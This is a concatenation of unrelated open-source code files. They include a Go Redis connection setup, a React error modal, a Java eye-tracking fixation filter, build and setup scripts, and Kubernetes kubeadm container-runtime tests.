poolSize = jsonData.PoolSize
}
// Connect, Read and Write Timeout
timeout := 10
if jsonData.Timeout > 0 {
timeout = jsonData.Timeout
}
// Ping Interval, disabled by default
pingInterval := 0
if jsonData.PingInterval > 0 {
pingInterval = jsonData.PingInterval
}
// Pipeline Window, disabled by default
pipelineWindow := 0
if jsonData.PipelineWindow > 0 {
pipelineWindow = jsonData.PipelineWindow
}
// Secured Data
var secureData = setting.DecryptedSecureJSONData
// Set up connection
connFunc := func(network, addr string) (radix.Conn, error) {
opts := []radix.DialOpt{radix.DialTimeout(time.Duration(timeout) * time.Second)}
// Authentication
if secureData != nil && secureData["password"] != "" {
// If ACL enabled
if jsonData.ACL {
opts = append(opts, radix.DialAuthUser(jsonData.User, secureData["password"]))
} else {
opts = append(opts, radix.DialAuthPass(secureData["password"]))
}
}
// TLS Authentication
if jsonData.TLSAuth {
// TLS Config
tlsConfig := &tls.Config{
InsecureSkipVerify: jsonData.TLSSkipVerify,
}
// Certification Authority
if secureData["tlsCACert"] != "" {
caPool := x509.NewCertPool()
ok := caPool.AppendCertsFromPEM([]byte(secureData["tlsCACert"]))
if ok {
tlsConfig.RootCAs = caPool
}
}
// Certificate and Key
if secureData["tlsClientCert"] != "" {
cert, err := tls.X509KeyPair([]byte(secureData["tlsClientCert"]), []byte(secureData["tlsClientKey"]))
if err == nil {
tlsConfig.Certificates = []tls.Certificate{cert}
} else {
log.DefaultLogger.Error("X509KeyPair", "Error", err)
return nil, err
}
}
// Add TLS Config
opts = append(opts, radix.DialUseTLS(tlsConfig))
}
return radix.Dial(network, addr, opts...)
}
// Pool with specified Ping Interval, Pipeline Window and Timeout
poolFunc := func(network, addr string) (radix.Client, error) {
return radix.NewPool(network, addr, poolSize, radix.PoolConnFunc(connFunc),
radix.PoolPingInterval(time.Duration(pingInterval)*time.Second/time.Duration(poolSize+1)),
radix.PoolPipelineWindow(time.Duration(pipelineWindow)*time.Microsecond, 0))
}
var client ClientInterface
var err error
// Client Type
switch jsonData.Client {
case "cluster":
client, err = radix.NewCluster(strings.Split(setting.URL, ","), radix.ClusterPoolFunc(poolFunc))
case "sentinel":
client, err = radix.NewSentinel(jsonData.SentinelName, strings.Split(setting.URL, ","), radix.SentinelConnFunc(connFunc),
radix.SentinelPoolFunc(poolFunc))
case "socket":
client, err = poolFunc("unix", setting.URL)
default:
client, err = poolFunc("tcp", setting.URL)
}
if err != nil {
return nil, err
}
return &instanceSettings{
client,
}, nil
}
/**
* Called before creating a new instance to close Redis connection pool
*/
func (s *instanceSettings) Dispose() {
s.client.Close()
}
|
import {
Box,
Button,
Collapse,
List,
ListItem,
Modal,
ModalBody,
ModalOverlay,
ModalContent,
ModalHeader,
ModalCloseButton,
ModalFooter,
Stack,
Text
} from '@chakra-ui/react'
import {useState} from 'react'
import {FallbackProps} from 'react-error-boundary'
import {ExternalLink} from 'lib/components/link'
const title = 'Unfortunately it appears an error has occured..'
function StackTrace({stackTrace, ...p}) {
// Hide the stack trace in production
const [show, setShow] = useState(process.env.NODE_ENV !== 'production')
const handleToggle = () => setShow((show) => !show)
return (
<Stack spacing={4} {...p}>
<Button onClick={handleToggle} colorScheme='blue'>
{show ? 'Hide' : 'Show'} stack trace
</Button>
<Collapse in={show}>
<Box
fontFamily='mono'
overflowX='scroll'
whiteSpace='pre'
padding={2}
bg='gray.800'
color='white'
>
{stackTrace}
</Box>
</Collapse>
</Stack>
)
}
export default function ErrorModal({error, resetErrorBoundary}: FallbackProps) {
const errorMessage = typeof error === 'string' ? error : error.message
const stack = error.stack
return (
<Modal
closeOnOverlayClick={false}
isOpen={!!error}
onClose={() => resetErrorBoundary()}
size='2xl'
>
<ModalOverlay />
<ModalContent borderRadius='4px'>
<ModalHeader>{title}</ModalHeader>
<ModalCloseButton />
<ModalBody>
<Stack spacing={4}>
<Text>{errorMessage}</Text>
{stack && <StackTrace stackTrace={stack} />}
<List styleType='disc'>
<ListItem>
<ExternalLink href='https://support.apple.com/en-us/HT201361'>
How to take a screenshot on a Mac
</ExternalLink>
</ListItem>
<ListItem>
<ExternalLink href='https://www.howtogeek.com/226280/how-to-take-screenshots-in-windows-10/'>
How to take a screenshot on a PC
</ExternalLink>
</ListItem>
</List>
</Stack>
</ModalBody>
<ModalFooter>
<Button
onClick={() => {
resetErrorBoundary()
window.history.back()
}}
colorScheme='yellow'
>
Go back
</Button>
</ModalFooter>
</ModalContent>
</Modal>
)
}
|
<reponame>MunzT/ETFuse
package de.uni_stuttgart.visus.etfuse.eyetracker.gazefilter;
import java.awt.geom.Point2D;
import java.util.ArrayList;
import de.uni_stuttgart.visus.etfuse.eyetracker.EyeTrackerEyeEvent;
import de.uni_stuttgart.visus.etfuse.eyetracker.EyeTrackerRecording;
public class IVTFilter {
private static class PointToPointVelocity {
int idx;
double velocity;
Boolean isFixation = false;
}
private static class Fixation {
int startIdx;
int stopIdx;
double x;
double y;
}
public static EyeTrackerRecording filterRecording(EyeTrackerRecording rec,
double velocityThreshold,
int distanceThreshold) {
ArrayList<EyeTrackerEyeEvent> events = rec.getRawEyeEvents();
ArrayList<PointToPointVelocity> p2pvs = new ArrayList<PointToPointVelocity>();
PointToPointVelocity first = new PointToPointVelocity();
first.idx = 0;
first.velocity = 0.0;
p2pvs.add(first);
for (int i = 1; i < events.size() - 1; i++) {
EyeTrackerEyeEvent e0 = events.get(i - 1);
EyeTrackerEyeEvent e1 = events.get(i);
EyeTrackerEyeEvent e2 = events.get(i + 1);
double angleVelocitye0e1 = calculateInterPointVelocity(e0, e1, rec.getDisplayPPI(),
rec.getSamplingFrequency());
double angleVelocitye1e2 = calculateInterPointVelocity(e1, e2, rec.getDisplayPPI(),
rec.getSamplingFrequency());
double pointToPointVelocity = (angleVelocitye0e1 + angleVelocitye1e2) / 2.0;
PointToPointVelocity p2pv = new PointToPointVelocity();
p2pv.idx = i;
p2pv.velocity = pointToPointVelocity;
p2pv.isFixation = (pointToPointVelocity < velocityThreshold ? true : false);
p2pvs.add(p2pv);
}
PointToPointVelocity last = new PointToPointVelocity();
last.idx = events.size() - 1;
last.velocity = 0.0;
p2pvs.add(last);
ArrayList<EyeTrackerEyeEvent> fixations =
generateFixationEvents(events, filterByDistanceThreshold(
mapFixationGroupsToCentroid(generateFixationGroups(events, p2pvs)),
distanceThreshold));
rec.setFilteredEyeEvents(fixations);
System.out.println("<IVTFilter> Events: " + events.size() + " Fixations: " + fixations.size());
return rec;
}
private static double calculateEventEyeDistAverage(EyeTrackerEyeEvent e) {
double eyePosAverageX = (e.eyePosLeftX + e.eyePosRightX) * 0.5;
double eyePosAverageY = (e.eyePosLeftY + e.eyePosRightY) * 0.5;
double observerBaseDist = (e.eyePosLeftZ + e.eyePosRightZ) * 0.5;
Point2D eventPoint = new Point2D.Double(e.realFixationPointX, e.realFixationPointY);
Point2D basePoint = new Point2D.Double(eyePosAverageX, eyePosAverageY);
double eventBaseDist = eventPoint.distance(basePoint);
double eyeEventDist = Math.sqrt(Math.pow(observerBaseDist, 2) + Math.pow(eventBaseDist, 2) -
2 * observerBaseDist * eventBaseDist * Math.cos(Math.toRadians(90)));
return eyeEventDist;
}
private static double calculateInterPointVelocity(EyeTrackerEyeEvent e1, EyeTrackerEyeEvent e2,
double displayPPI, double samplingFrequency) {
double averageEyeDist1_b = IVTFilter.calculateEventEyeDistAverage(e1);
double averageEyeDist2_a = IVTFilter.calculateEventEyeDistAverage(e2);
double averageEyeDistBetweenEvents = 0.5 * (averageEyeDist1_b + averageEyeDist2_a);
Point2D e1P_A = new Point2D.Double(e1.realFixationPointX, e1.realFixationPointY);
Point2D e2P_B = new Point2D.Double(e2.realFixationPointX, e2.realFixationPointY);
double eventPointDist_c = e1P_A.distance(e2P_B);
double eventPointDist_mm = pixelDistanceToMillimeters(eventPointDist_c, displayPPI);
double gazeAngle_gamma = Math.acos((Math.pow(eventPointDist_mm, 2)
- Math.pow(averageEyeDistBetweenEvents, 2)
- Math.pow(averageEyeDistBetweenEvents, 2))
/ (-2 * averageEyeDistBetweenEvents * averageEyeDistBetweenEvents));
gazeAngle_gamma = Math.toDegrees(gazeAngle_gamma);
if (Double.isNaN(gazeAngle_gamma)) {
System.out.println("NaN :(");
System.out.println("b: " + averageEyeDist1_b + " a: " + averageEyeDist2_a + " c: "
+ eventPointDist_c + " e1: " + e1P_A + " e2: " + e2P_B);
}
double eventAngleSeconds = gazeAngle_gamma / (1.0 / samplingFrequency);
return eventAngleSeconds;
}
private static ArrayList<EyeTrackerEyeEvent>
filterOutEventsWithoutEyes(ArrayList<EyeTrackerEyeEvent> events) {
ArrayList<EyeTrackerEyeEvent> filtered = new ArrayList<EyeTrackerEyeEvent>();
for (EyeTrackerEyeEvent e : events) {
if (e.eyesNotFound)
continue;
filtered.add(e);
}
return filtered;
}
private static double pixelDistanceToMillimeters(double distance, double ppi) {
double inches = distance / ppi;
double mm = inches / 0.039370;
return mm;
}
private static ArrayList<ArrayList<Fixation>>
generateFixationGroups(ArrayList<EyeTrackerEyeEvent> events,
ArrayList<PointToPointVelocity> protocol) {
ArrayList<ArrayList<Fixation>> fixationGroups = new ArrayList<ArrayList<Fixation>>();
ArrayList<Fixation> currentFixationGroup = new ArrayList<Fixation>();
for (PointToPointVelocity p : protocol) {
if (p.isFixation) {
Fixation fix = new Fixation();
fix.startIdx = p.idx;
fix.stopIdx = p.idx;
fix.x = events.get(p.idx).realFixationPointX;
fix.y = events.get(p.idx).realFixationPointY;
currentFixationGroup.add(fix);
}
else {
if (currentFixationGroup.size() > 0) {
fixationGroups.add(currentFixationGroup);
currentFixationGroup = new ArrayList<Fixation>();
}
}
}
return fixationGroups;
}
private static ArrayList<Fixation>
mapFixationGroupsToCentroid(ArrayList<ArrayList<Fixation>> fixationGroups) {
ArrayList<Fixation> fixations = new ArrayList<Fixation>();
for (ArrayList<Fixation> currentGroup : fixationGroups) {
double fixPointX = 0.0;
double fixPointY = 0.0;
for (Fixation f : currentGroup) {
fixPointX += f.x;
fixPointY += f.y;
}
fixPointX = fixPointX / currentGroup.size();
fixPointY = fixPointY / currentGroup.size();
Fixation newF = new Fixation();
newF.x = fixPointX;
newF.y = fixPointY;
newF.startIdx = currentGroup.get(0).startIdx;
newF.stopIdx = currentGroup.get(currentGroup.size() - 1).stopIdx;
fixations.add(newF);
}
return fixations;
}
private static ArrayList<Fixation> filterByDistanceThreshold(ArrayList<Fixation> fixations,
int distanceThreshold) {
ArrayList<Fixation> filteredFixations = fixations;
ArrayList<Fixation> newFixations = new ArrayList<Fixation>();
Boolean repeat = true;
while (repeat) {
repeat = false;
for (int i = 0; i < filteredFixations.size() - 1; i++) {
Fixation e1 = filteredFixations.get(i);
Fixation e2 = filteredFixations.get(i + 1);
Point2D e1P = new Point2D.Double(e1.x, e1.y);
Point2D e2P = new Point2D.Double(e2.x, e2.y);
if (e1P.distance(e2P) < distanceThreshold) {
repeat = true;
double newX = (e1.x + e2.x) / 2.0;
double newY = (e1.y + e2.y) / 2.0;
Fixation fNew = new Fixation();
fNew.x = newX;
fNew.y = newY;
fNew.startIdx = e1.startIdx;
fNew.stopIdx = e2.stopIdx;
newFixations.add(fNew);
i++;
}
else {
newFixations.add(e1);
}
}
filteredFixations = newFixations;
if (repeat)
newFixations = new ArrayList<Fixation>();
}
return filteredFixations;
}
private static ArrayList<EyeTrackerEyeEvent>
generateFixationEvents(ArrayList<EyeTrackerEyeEvent> allEvents,
ArrayList<Fixation> fixations) {
ArrayList<EyeTrackerEyeEvent> fixationEvents = new ArrayList<EyeTrackerEyeEvent>();
for (Fixation f : fixations) {
EyeTrackerEyeEvent startingEvent = allEvents.get(f.startIdx);
EyeTrackerEyeEvent fixE = new EyeTrackerEyeEvent();
fixE.fixationPointX = (int) Math.round(f.x);
fixE.fixationPointY = (int) Math.round(f.y);
fixE.timestamp = startingEvent.timestamp;
fixE.number = startingEvent.number;
fixE.eyesNotFound = startingEvent.eyesNotFound;
fixE.fixationDuration = allEvents.get(f.stopIdx).timestamp - fixE.timestamp;
fixationEvents.add(fixE);
}
return fixationEvents;
}
}
|
<reponame>tom-weatherhead/thaw-genetic
// thaw-genetic/src/interfaces/ichromosome.ts
export interface IChromosome {
fitness: number;
toString(): string;
/* eslint-disable @typescript-eslint/no-explicit-any */
compareFitness(other: any): number;
isEqualTo(other: any): boolean;
/* eslint-enable @typescript-eslint/no-explicit-any */
}
export interface IChromosomeFactory<T extends IChromosome> {
createSeedChromosomes(): T[];
createRandomChromosome(): T;
}
|
<reponame>Harveyhubbell/Paid-RTOS<filename>Reference/qpc/html/search/all_17.js<gh_stars>0
var searchData=
[
['waitset_914',['waitSet',['../qxthread_8h.html#ab7f603a22e6cbc0d27a31d338cad5eb6',1,'QXSemaphore::waitSet()'],['../qxthread_8h.html#ab7f603a22e6cbc0d27a31d338cad5eb6',1,'QXMutex::waitSet()']]],
['win32_20api_20_28windows_29_915',['Win32 API (Windows)',['../win32.html',1,'ports_os']]],
['win32_2dqv_20_28windows_20with_20qv_29_916',['Win32-QV (Windows with QV)',['../win32-qv.html',1,'ports_os']]],
['win32_5fgui_917',['WIN32_GUI',['../macros_8h.html#a8f79859d1e9f6f0a55e722dfe573c547',1,'macros.h']]]
];
|
#!python
# Copyright (C) 2017, 2019-2020 FIUBioRG
# SPDX-License-Identifier: MIT
import os
from os import path
import subprocess
from subprocess import Popen, PIPE
import sys
python_version = ".".join(map(str, sys.version_info[0:2]))
###################################################################
# HELPER FUNCTIONS
###################################################################
def SourcePath(*args):
res = []
for p in args:
res.append(path.abspath("./src/" + p))
return res
def ObjectPath(*args):
res = []
for p in args:
res.append(path.abspath("./obj/" + p))
return res
def LibPath(*args):
res = []
for p in args:
res.append(path.abspath("./lib/" + p))
return res
def cmdline(command):
process = Popen(args=command, stdout=PIPE, shell=True)
return process.communicate()[0].decode("utf8")
def CheckPerl(ctx):
ctx.Message("Checking Perl configuration... ")
source = """
use strict;
use Config;
use File::Spec;
sub search {
my $paths = shift;
my $file = shift;
foreach(@{$paths}) {
if (-f "$_/$file") {
return "$_/$file";
last
}
}
return;
}
my $coredir = File::Spec->catfile($Config{installarchlib}, "CORE");
open(F, ">", ".perlconfig.txt");
print F "perl=$Config{perlpath}\\n";
print F "typemap=" . search(\\@INC, "ExtUtils/typemap") . "\\n";
print F "xsubpp=" . search(\\@INC, "ExtUtils/xsubpp" || search([File::Spec->path()], "xsubpp")) . "\\n";
print F "coredir=$coredir\\n";
close F;
"""
f = open(".perltest.pl", "w")
f.write(source)
f.close()
retcode = subprocess.call("perl .perltest.pl", shell=True)
ctx.Result(retcode == 0)
os.unlink(".perltest.pl")
return retcode == 0
|
#!/bin/bash
set -e
. /webgetpics-www/setup/share.sh
sed 's/^CheckSpace/#CheckSpace/g' -i /etc/pacman.conf
pacman-key --refresh-keys
# Pacman database has changed in version 4.2 on 2014-12-29.
# Need to upgrade it first before going any further.
echo "Server = $AA_ROOT/repos/2014/12/28/\$repo/os/\$arch" \
> /etc/pacman.d/mirrorlist
pacman -Syyuu --noconfirm
echo "Server = $AA_ROOT/repos/2014/12/29/\$repo/os/\$arch" \
> /etc/pacman.d/mirrorlist
pacman -Sy --noconfirm pacman
pacman-db-upgrade
pacman -Syyuu --noconfirm
# Finish the upgrade.
echo "Server = $AA_ROOT/repos/$AA_YEAR/$AA_MONTH/$AA_DAY/\$repo/os/\$arch" \
> /etc/pacman.d/mirrorlist
pacman -Syyuu --noconfirm
pacman -S --noconfirm --needed base base-devel rsyslog sudo
paccache -rk0
# user
useradd -u 1000 -m user -G wheel
chmod +w /etc/sudoers
echo '%wheel ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
chown -R user:user /webgetpics-www
pacman -S --noconfirm --needed git imagemagick npm openssh
sudo -u user bash -l /webgetpics-www/setup/as-user.sh
paccache -rk0
|
<filename>1704-Determine if String Halves Are Alike/cpp_1704/Solution1.h
/**
* @author ooooo
* @date 2021/1/24 17:14
*/
#ifndef CPP_1704__SOLUTION1_H_
#define CPP_1704__SOLUTION1_H_
#include <iostream>
#include <vector>
#include <unordered_set>
#include <unordered_map>
#include <queue>
#include <stack>
#include <numeric>
using namespace std;
class Solution {
public:
bool halvesAreAlike(string s) {
int n = s.size();
unordered_set<char> set = {'a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U'};
int cnt1 = 0, cnt2 = 0;
for (int i = 0; i < n; ++i) {
if (i < n / 2) {
if (set.count(s[i])) {
cnt1++;
}
} else {
if (set.count(s[i])) {
cnt2++;
}
}
}
return cnt1 == cnt2;
}
};
#endif //CPP_1704__SOLUTION1_H_
|
<reponame>lananh265/social-network<filename>node_modules/react-icons-kit/md/ic_emoji_emotions_twotone.js
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.ic_emoji_emotions_twotone = void 0;
var ic_emoji_emotions_twotone = {
"viewBox": "0 0 24 24",
"children": [{
"name": "g",
"attribs": {},
"children": [{
"name": "rect",
"attribs": {
"fill": "none",
"height": "24",
"width": "24"
},
"children": [{
"name": "rect",
"attribs": {
"fill": "none",
"height": "24",
"width": "24"
},
"children": []
}]
}]
}, {
"name": "g",
"attribs": {},
"children": [{
"name": "g",
"attribs": {},
"children": [{
"name": "g",
"attribs": {},
"children": []
}]
}, {
"name": "g",
"attribs": {},
"children": [{
"name": "g",
"attribs": {},
"children": [{
"name": "path",
"attribs": {
"d": "M20,12c0-4.42-3.58-8-8-8s-8,3.58-8,8s3.58,8,8,8S20,16.42,20,12z M8.5,8C9.33,8,10,8.67,10,9.5 S9.33,11,8.5,11S7,10.33,7,9.5S7.67,8,8.5,8z M12,18c-2.28,0-4.22-1.66-5-4h10C16.22,16.34,14.28,18,12,18z M15.5,11 c-0.83,0-1.5-0.67-1.5-1.5S14.67,8,15.5,8S17,8.67,17,9.5S16.33,11,15.5,11z",
"opacity": ".3"
},
"children": [{
"name": "path",
"attribs": {
"d": "M20,12c0-4.42-3.58-8-8-8s-8,3.58-8,8s3.58,8,8,8S20,16.42,20,12z M8.5,8C9.33,8,10,8.67,10,9.5 S9.33,11,8.5,11S7,10.33,7,9.5S7.67,8,8.5,8z M12,18c-2.28,0-4.22-1.66-5-4h10C16.22,16.34,14.28,18,12,18z M15.5,11 c-0.83,0-1.5-0.67-1.5-1.5S14.67,8,15.5,8S17,8.67,17,9.5S16.33,11,15.5,11z",
"opacity": ".3"
},
"children": []
}]
}, {
"name": "circle",
"attribs": {
"cx": "15.5",
"cy": "9.5",
"r": "1.5"
},
"children": [{
"name": "circle",
"attribs": {
"cx": "15.5",
"cy": "9.5",
"r": "1.5"
},
"children": []
}]
}, {
"name": "circle",
"attribs": {
"cx": "8.5",
"cy": "9.5",
"r": "1.5"
},
"children": [{
"name": "circle",
"attribs": {
"cx": "8.5",
"cy": "9.5",
"r": "1.5"
},
"children": []
}]
}, {
"name": "path",
"attribs": {
"d": "M11.99,2C6.47,2,2,6.48,2,12c0,5.52,4.47,10,9.99,10C17.52,22,22,17.52,22,12C22,6.48,17.52,2,11.99,2z M12,20 c-4.42,0-8-3.58-8-8c0-4.42,3.58-8,8-8s8,3.58,8,8C20,16.42,16.42,20,12,20z"
},
"children": [{
"name": "path",
"attribs": {
"d": "M11.99,2C6.47,2,2,6.48,2,12c0,5.52,4.47,10,9.99,10C17.52,22,22,17.52,22,12C22,6.48,17.52,2,11.99,2z M12,20 c-4.42,0-8-3.58-8-8c0-4.42,3.58-8,8-8s8,3.58,8,8C20,16.42,16.42,20,12,20z"
},
"children": []
}]
}, {
"name": "path",
"attribs": {
"d": "M12,18c2.28,0,4.22-1.66,5-4H7C7.78,16.34,9.72,18,12,18z"
},
"children": [{
"name": "path",
"attribs": {
"d": "M12,18c2.28,0,4.22-1.66,5-4H7C7.78,16.34,9.72,18,12,18z"
},
"children": []
}]
}]
}]
}]
}]
};
exports.ic_emoji_emotions_twotone = ic_emoji_emotions_twotone; |
#pragma once
#include <algorithm>
#include <sstream>
#include <string>
#include <string_view>
#include <utility>
#include <vector>
#include "filesys.h"
template<typename T>
bool matches_extension(const fs::path &path, T begin, T end) {
if (!path.has_extension()) {
return false;
}
return std::find(begin, end, path.extension().c_str()) != end;
}
bool is_source_file(const fs::path &path);
bool is_header_file(const fs::path &path);
std::vector<std::string> split_command(const std::string &command_line);
void replace_pattern_with(std::string &str, std::string_view to_replace, std::string_view replace_with);
|
#!/bin/bash
cd /home/nlpserver/zzilong/kaldi/egs/supermarket-product
. ./path.sh
( echo '#' Running on `hostname`
echo '#' Started at `date`
echo -n '# '; cat <<EOF
nnet-am-average exp/nnet4a/149.1.mdl exp/nnet4a/149.2.mdl exp/nnet4a/149.3.mdl exp/nnet4a/149.4.mdl exp/nnet4a/149.5.mdl exp/nnet4a/149.6.mdl exp/nnet4a/149.7.mdl exp/nnet4a/149.8.mdl - | nnet-am-copy --learning-rates=0.00527762050880116:0.00263881025440058:0.00263881025440058 - exp/nnet4a/149.mdl
EOF
) >exp/nnet4a/log/average.148.log
time1=`date +"%s"`
( nnet-am-average exp/nnet4a/149.1.mdl exp/nnet4a/149.2.mdl exp/nnet4a/149.3.mdl exp/nnet4a/149.4.mdl exp/nnet4a/149.5.mdl exp/nnet4a/149.6.mdl exp/nnet4a/149.7.mdl exp/nnet4a/149.8.mdl - | nnet-am-copy --learning-rates=0.00527762050880116:0.00263881025440058:0.00263881025440058 - exp/nnet4a/149.mdl ) 2>>exp/nnet4a/log/average.148.log >>exp/nnet4a/log/average.148.log
ret=$?
time2=`date +"%s"`
echo '#' Accounting: time=$(($time2-$time1)) threads=1 >>exp/nnet4a/log/average.148.log
echo '#' Finished at `date` with status $ret >>exp/nnet4a/log/average.148.log
[ $ret -eq 137 ] && exit 100;
touch exp/nnet4a/q/done.11044
exit $[$ret ? 1 : 0]
## submitted with:
# qsub -v PATH -cwd -S /bin/bash -j y -l arch=*64* -o exp/nnet4a/q/average.148.log -l mem_free=10G,ram_free=2G,arch=*64 /home/nlpserver/zzilong/kaldi/egs/supermarket-product/exp/nnet4a/q/average.148.sh >>exp/nnet4a/q/average.148.log 2>&1
|
python3 tools/train.py --config_file='configs/softmax_triplet.yml' MODEL.DEVICE_ID "('1')" MODEL.NAME "('HRNet32')" MODEL.PRETRAIN_PATH "('checkpoints/hrnetv2_w32_imagenet_pretrained.pth')" DATASETS.NAMES "('market1501')" DATASETS.ROOT_DIR "('/data/market1501')" CLUSTERING.PART_NUM "(7)" DATASETS.PSEUDO_LABEL_SUBDIR "('train_pseudo_labels-ISP-7')" OUTPUT_DIR "('./log/ISP-market-7')"
|
/*
Copyright 2018 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package util
import (
"io/ioutil"
"net"
"os"
"reflect"
"runtime"
"testing"
"github.com/pkg/errors"
"k8s.io/utils/exec"
fakeexec "k8s.io/utils/exec/testing"
"k8s.io/kubernetes/cmd/kubeadm/app/constants"
)
func TestNewContainerRuntime(t *testing.T) {
execLookPathOK := fakeexec.FakeExec{
LookPathFunc: func(cmd string) (string, error) { return "/usr/bin/crictl", nil },
}
execLookPathErr := fakeexec.FakeExec{
LookPathFunc: func(cmd string) (string, error) { return "", errors.Errorf("%s not found", cmd) },
}
cases := []struct {
name string
execer fakeexec.FakeExec
criSocket string
isDocker bool
isError bool
}{
{"valid: default cri socket", execLookPathOK, constants.DefaultDockerCRISocket, true, false},
{"valid: cri-o socket url", execLookPathOK, "unix:///var/run/crio/crio.sock", false, false},
{"valid: cri-o socket path", execLookPathOK, "/var/run/crio/crio.sock", false, false},
{"invalid: no crictl", execLookPathErr, "unix:///var/run/crio/crio.sock", false, true},
}
for _, tc := range cases {
t.Run(tc.name, func(t *testing.T) {
runtime, err := NewContainerRuntime(&tc.execer, tc.criSocket)
if err != nil {
if !tc.isError {
t.Fatalf("unexpected NewContainerRuntime error. criSocket: %s, error: %v", tc.criSocket, err)
}
return // expected error occurs, impossible to test runtime further
}
if tc.isError && err == nil {
t.Fatalf("unexpected NewContainerRuntime success. criSocket: %s", tc.criSocket)
}
isDocker := runtime.IsDocker()
if tc.isDocker != isDocker {
t.Fatalf("unexpected isDocker() result %v for the criSocket %s", isDocker, tc.criSocket)
}
})
}
}
func genFakeActions(fcmd *fakeexec.FakeCmd, num int) []fakeexec.FakeCommandAction {
var actions []fakeexec.FakeCommandAction
for i := 0; i < num; i++ {
actions = append(actions, func(cmd string, args ...string) exec.Cmd {
return fakeexec.InitFakeCmd(fcmd, cmd, args...)
})
}
return actions
}
func TestIsRunning(t *testing.T) {
fcmd := fakeexec.FakeCmd{
CombinedOutputScript: []fakeexec.FakeAction{
func() ([]byte, []byte, error) { return nil, nil, nil },
func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
func() ([]byte, []byte, error) { return nil, nil, nil },
func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
},
}
criExecer := fakeexec.FakeExec{
CommandScript: genFakeActions(&fcmd, len(fcmd.CombinedOutputScript)),
LookPathFunc: func(cmd string) (string, error) { return "/usr/bin/crictl", nil },
}
dockerExecer := fakeexec.FakeExec{
CommandScript: genFakeActions(&fcmd, len(fcmd.CombinedOutputScript)),
LookPathFunc: func(cmd string) (string, error) { return "/usr/bin/docker", nil },
}
cases := []struct {
name string
criSocket string
execer fakeexec.FakeExec
isError bool
}{
{"valid: CRI-O is running", "unix:///var/run/crio/crio.sock", criExecer, false},
{"invalid: CRI-O is not running", "unix:///var/run/crio/crio.sock", criExecer, true},
{"valid: docker is running", constants.DefaultDockerCRISocket, dockerExecer, false},
{"invalid: docker is not running", constants.DefaultDockerCRISocket, dockerExecer, true},
}
for _, tc := range cases {
t.Run(tc.name, func(t *testing.T) {
runtime, err := NewContainerRuntime(&tc.execer, tc.criSocket)
if err != nil {
t.Fatalf("unexpected NewContainerRuntime error: %v", err)
}
isRunning := runtime.IsRunning()
if tc.isError && isRunning == nil {
t.Error("unexpected IsRunning() success")
}
if !tc.isError && isRunning != nil {
t.Error("unexpected IsRunning() error")
}
})
}
}
func TestListKubeContainers(t *testing.T) {
fcmd := fakeexec.FakeCmd{
CombinedOutputScript: []fakeexec.FakeAction{
func() ([]byte, []byte, error) { return []byte("k8s_p1\nk8s_p2"), nil, nil },
func() ([]byte, []byte, error) { return nil, nil, &fakeexec.FakeExitError{Status: 1} },
func() ([]byte, []byte, error) { return []byte("k8s_p1\nk8s_p2"), nil, nil },
},
}
execer := fakeexec.FakeExec{
CommandScript: genFakeActions(&fcmd, len(fcmd.CombinedOutputScript)),
LookPathFunc: func(cmd string) (string, error) { return "/usr/bin/crictl", nil },
}
cases := []struct {
name string
criSocket string
isError bool
}{
{"valid: list containers using CRI socket url", "unix:///var/run/crio/crio.sock", false},
{"invalid: list containers using CRI socket url", "unix:///var/run/crio/crio.sock", true},
{"valid: list containers using docker", constants.DefaultDockerCRISocket, false},
}
for _, tc := range cases {
t.Run(tc.name, func(t *testing.T) {
runtime, err := NewContainerRuntime(&execer, tc.criSocket)
if err != nil {
t.Fatalf("unexpected NewContainerRuntime error: %v", err)
}
containers, err := runtime.ListKubeContainers()
if tc.isError {
if err == nil {
t.Errorf("unexpected ListKubeContainers success")
}
return
} else if err != nil {
t.Errorf("unexpected ListKubeContainers error: %v", err)
}
if !reflect.DeepEqual(containers, []string{"k8s_p1", "k8s_p2"}) {
t.Errorf("unexpected ListKubeContainers output: %v", containers)
}
})
}
}
func TestRemoveContainers(t *testing.T) {
fakeOK := func() ([]byte, []byte, error) { return nil, nil, nil }
fakeErr := func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} }
fcmd := fakeexec.FakeCmd{
CombinedOutputScript: []fakeexec.FakeAction{
fakeOK, fakeOK, fakeOK, fakeOK, fakeOK, fakeOK, // Test case 1
fakeOK, fakeOK, fakeOK, fakeErr, fakeOK, fakeOK,
fakeErr, fakeOK, fakeOK, fakeErr, fakeOK,
fakeOK, fakeOK, fakeOK, fakeOK, fakeOK, fakeOK,
fakeOK, fakeOK, fakeOK, fakeErr, fakeOK, fakeOK,
fakeErr, fakeOK, fakeOK, fakeErr, fakeOK,
},
}
execer := fakeexec.FakeExec{
CommandScript: genFakeActions(&fcmd, len(fcmd.CombinedOutputScript)),
LookPathFunc: func(cmd string) (string, error) { return "/usr/bin/crictl", nil },
}
cases := []struct {
name string
criSocket string
containers []string
isError bool
}{
{"valid: remove containers using CRI", "unix:///var/run/crio/crio.sock", []string{"k8s_p1", "k8s_p2", "k8s_p3"}, false}, // Test case 1
{"invalid: CRI rmp failure", "unix:///var/run/crio/crio.sock", []string{"k8s_p1", "k8s_p2", "k8s_p3"}, true},
{"invalid: CRI stopp failure", "unix:///var/run/crio/crio.sock", []string{"k8s_p1", "k8s_p2", "k8s_p3"}, true},
{"valid: remove containers using docker", constants.DefaultDockerCRISocket, []string{"k8s_c1", "k8s_c2", "k8s_c3"}, false},
{"invalid: docker rm failure", constants.DefaultDockerCRISocket, []string{"k8s_c1", "k8s_c2", "k8s_c3"}, true},
{"invalid: docker stop failure", constants.DefaultDockerCRISocket, []string{"k8s_c1", "k8s_c2", "k8s_c3"}, true},
}
for _, tc := range cases {
t.Run(tc.name, func(t *testing.T) {
runtime, err := NewContainerRuntime(&execer, tc.criSocket)
if err != nil {
t.Fatalf("unexpected NewContainerRuntime error: %v, criSocket: %s", err, tc.criSocket)
}
